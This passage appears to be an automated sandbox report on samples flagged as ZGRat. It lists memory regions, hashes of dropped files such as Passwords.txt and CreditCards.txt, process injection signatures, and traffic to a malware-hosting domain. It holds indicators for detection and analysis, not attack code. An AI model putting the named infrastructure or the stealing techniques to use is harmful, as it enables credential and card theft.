memory/2236-53-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-49-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-45-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-44-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-42-0x0000000004A80000-0x0000000004BB6000-memory.dmp
memory/2236-40-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | d53f91c99e731fae151b03b600b1b05b |
| SHA1 | 3d06e3a29acdf75eef3698c0cf72e16990def99c |
| SHA256 | 3e16b688dd6eded9503ebf4a804adaae02e4628cc1cc52c749e17c3ed58123be |
| SHA512 | 5f60964eb2d4df0d0ff7544fb78568e01a7b0f9cd133e509ed17243f858b0acac415d85d03212746af207d4169d7b01a715a5ada92bfe52d417ac25cd55fd8d7 |
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | 29c11e7b0c44cbbfec546b0469dcc8a2 |
| SHA1 | 1227f46ba3b08ebad1a6f3536d4e523f5830a12c |
| SHA256 | 572de60da00d0f6ef8657e766d84a5284f3a90d6b6d4cd8795ef1d5af95c0ee6 |
| SHA512 | 143bf88b9d6d07bb0fb0b059d2b6ea2c529e9a401c55653e94fd79285a4e506e42cdd0bc0d5ae7877a0062d3de76dedf1f94c7cfaded7db0f57aa53b581cae06 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | d0df5f9974138501424cb06472477adf |
| SHA1 | 9d143e2c9c48327c6fa0b4f2fb65be982037db51 |
| SHA256 | 6c3615c908cb98afc062e70b7f985bf7b667fd8540a25824aa07a14b6b6a05d6 |
| SHA512 | 9a7d8b47a8311e00ba206fee9bf0d42991a0caaf43492ea067bb6c9eb333a3231a35bae1efcd95add82d6dbfcfef5e10d42c084b9e73c5fdd7eadf8131324617 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | 21c7373cbebe36d40311199e37a311ff |
| SHA1 | 4966bb36fa9545fa8481d1314471a374f3d053c3 |
| SHA256 | 9219e342d27bc5f3824eb6198773d7953e840b9e62220de75c4652fdfac3815a |
| SHA512 | a09399ab463e5616d61345a0c3538e3ea34d185e12f525ffb7b7f3d364771f7d142969a4e10221c5cb6129b934f48eeae122e0bd50a57ac7f1d0eadb9bdece20 |
memory/2236-2007-0x0000000005190000-0x000000000525E000-memory.dmp
memory/2236-2008-0x0000000005000000-0x000000000504C000-memory.dmp
memory/2236-2002-0x0000000002510000-0x0000000002511000-memory.dmp
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | 273a0cfac73dc5c9525fe0b5d3b21dee |
| SHA1 | e29164a17369cbc87a21fac0720249c288ab3097 |
| SHA256 | 3708f0d7d78b4e11fd45fcadc6dc83105870bb8ec92eea2faa00e08989fca735 |
| SHA512 | 337937ae23f2c7282e9a388791cb73857b22e766153e7dbd90b1fe69c66881f745218fe534baecca6a54e1a06d653753de52618ed965bbd24ff4c48ce8d8ed0f |
memory/2348-2028-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2348-2031-0x00000000053C0000-0x0000000005452000-memory.dmp
memory/2348-2037-0x0000000002C50000-0x0000000002C60000-memory.dmp
memory/2348-2026-0x0000000000400000-0x0000000000578000-memory.dmp
memory/2236-2025-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
memory/2348-2069-0x0000000006330000-0x000000000633A000-memory.dmp
memory/3396-2079-0x0000000004490000-0x0000000004491000-memory.dmp
memory/3396-2080-0x0000000006480000-0x0000000006622000-memory.dmp
memory/3396-2078-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2086-0x0000000000400000-0x0000000000592000-memory.dmp
memory/2112-2087-0x0000000072170000-0x0000000072920000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | 36f6acc2229073f5bb4074cee73d1d5b |
| SHA1 | b2adbb44350d984dff40c15fcbbeb3379c7ec0e5 |
| SHA256 | 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35 |
| SHA512 | da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad |
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3396-2088-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2348-2084-0x0000000008B80000-0x0000000008BD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 194abb15d1b07f052be0b18ffa238050 |
| SHA1 | 8ec9ff9eeb88645f6e6b538c3163cc4894f82ec2 |
| SHA256 | e8f4ee6351764bc703f118df85c629084f85bd325bcc1930f0982461938a4ecb |
| SHA512 | 52c5a71a023f290962a445bc5c6befd0ce8f7310b6c9185022c6b520a07a61f846b684fa1d7533ada37deeb868a59cd0997d9cd1459f32957b527701ca296805 |
memory/2112-2121-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2348-2129-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2140-0x0000000005CF0000-0x0000000005CF8000-memory.dmp
memory/2112-2139-0x00000000057B0000-0x00000000057D6000-memory.dmp
memory/2112-2138-0x0000000005C60000-0x0000000005CF2000-memory.dmp
memory/2112-2142-0x0000000006C20000-0x0000000006C28000-memory.dmp
memory/2112-2143-0x0000000006C40000-0x0000000006C5E000-memory.dmp
memory/2112-2141-0x0000000006C10000-0x0000000006C1A000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Process.txt
| MD5 | e1261b30bcee5ffdb8725793d8247b4e |
| SHA1 | 22d3a1dd3d1e2e6351301a87b1d5fc79057ab0df |
| SHA256 | 185a74f3aa4672f9b94625d03f8828bbe2d31ad05c825008abdf0e2837921cf7 |
| SHA512 | acb1f33e644f1174079e5708bfbeaf4a227f576a07af56a822261edd88bd65965d52ca17bcc92406662ba4807550abc12692614b4adca9affcf697d2a225e0b5 |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/2112-2332-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2334-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2337-0x0000000006E90000-0x0000000006F0A000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Debug.txt
| MD5 | 9f7e8c90c8e4f0e6976a3d69a59e13e6 |
| SHA1 | a678403153d4e71bcae97c83c65707d9bcb86bb6 |
| SHA256 | 9a0344723389aee9269af868fdcd5ae0d22d04eb5e88b656fd146dd143e9a0ce |
| SHA512 | c13cd581b6062c538f2be58e88ec00d518f76e5f0f3870458a51489a4e833f8e7ba8408e58e94038c8dab21c63821d52d181faee1ddbf6128f29bbc545b533ed |
memory/2112-2410-0x0000000007140000-0x00000000071F2000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
memory/2112-2412-0x0000000008300000-0x0000000008654000-memory.dmp
C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\msgid.dat
| MD5 | af6f1933326883369932eff6d98e0098 |
| SHA1 | 888e43aff1981840211a034ba78e048a48ab3b8a |
| SHA256 | 8052615aa0bdf7a250e889aacee4d06c82cd18f01add69f89332d5db3fc1ca21 |
| SHA512 | 46b87b38eac0122ee226e348288a2acf272fb3d2e68503e20a1572a464e0a0b4b70b0f4225d5188b7c6dd1ba12d237a318fe3b43e9b4abae334b54f5a4a255f7 |
memory/2112-2430-0x0000000072170000-0x0000000072920000-memory.dmp
memory/2112-2437-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2438-0x00000000057E0000-0x00000000057F0000-memory.dmp
memory/2112-2439-0x00000000057E0000-0x00000000057F0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
5s
Max time network
126s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 352 set thread context of 2524 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| GB | 96.17.179.70:80 | tcp | |
| GB | 104.77.160.28:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| US | 8.8.8.8:53 | 68.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.179.17.96.in-addr.arpa | udp |
| GB | 104.77.160.28:80 | tcp | |
| GB | 104.77.160.28:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| N/A | 96.16.110.41:443 | tcp | |
| N/A | 20.223.35.26:443 | tcp | |
| N/A | 20.223.35.26:443 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| SE | 192.229.221.95:80 | tcp | |
| SE | 192.229.221.95:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp | |
| GB | 96.17.179.55:80 | tcp |
Files
memory/352-1-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/352-0-0x00000000001A0000-0x00000000001BC000-memory.dmp
memory/352-2-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/352-3-0x0000000005660000-0x0000000005796000-memory.dmp
memory/352-11-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-19-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-25-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-33-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-39-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-49-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-57-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-65-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-67-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-63-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-61-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-59-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-55-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-53-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-51-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-47-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-45-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-43-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-41-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-37-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-35-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-31-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-29-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-27-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-23-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-21-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-17-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-15-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-13-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-9-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-7-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-5-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-4-0x0000000005660000-0x0000000005790000-memory.dmp
memory/352-938-0x0000000005A70000-0x0000000005ABC000-memory.dmp
memory/352-937-0x00000000059A0000-0x0000000005A6E000-memory.dmp
memory/352-936-0x00000000057A0000-0x00000000057A1000-memory.dmp
memory/352-939-0x0000000006250000-0x00000000067F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RagCrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/2524-945-0x0000000000400000-0x0000000000578000-memory.dmp
memory/2524-944-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/2524-948-0x0000000005620000-0x0000000005630000-memory.dmp
memory/2524-947-0x0000000005460000-0x00000000054C6000-memory.dmp
memory/2524-946-0x00000000053C0000-0x0000000005452000-memory.dmp
memory/352-943-0x00000000751F0000-0x00000000759A0000-memory.dmp
memory/2524-949-0x0000000006300000-0x000000000630A000-memory.dmp
memory/2524-950-0x00000000087C0000-0x0000000008810000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
memory/2524-990-0x00000000751F0000-0x00000000759A0000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
135s
Max time network
150s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 13ab2123a617187ba186a53cef7a5f77 |
| SHA1 | d649d1cbb01018d02fa965adef7b97408d86fe9d |
| SHA256 | e8aa79d9d7ac6947fd7c2fc35b501dbc212ad1c1439d58bd58deae02ff81cf92 |
| SHA512 | e02c68c61711a572e90727129d9ff5f7494218e625f0600e135c44b57a7c29ef2cf2e686fdfb0afe04b4b248f853c88c35cd70761c8585c434d4a62a339fd7ad |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | c374c25875887db7d072033f817b6ce1 |
| SHA1 | 3a6d10268f30e42f973dadf044dba7497e05cdaf |
| SHA256 | 05d47b87b577841cc40db176ea634ec49b0b97066e192e1d48d84bb977e696b6 |
| SHA512 | 6a14f81a300695c09cb335c13155144e562c86bb0ddfdcab641eb3a168877ad3fcc0579ad86162622998928378ea2ffe5a244b3ddbe6c11a959dbb34af374a7d |
Analysis: behavioral4
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
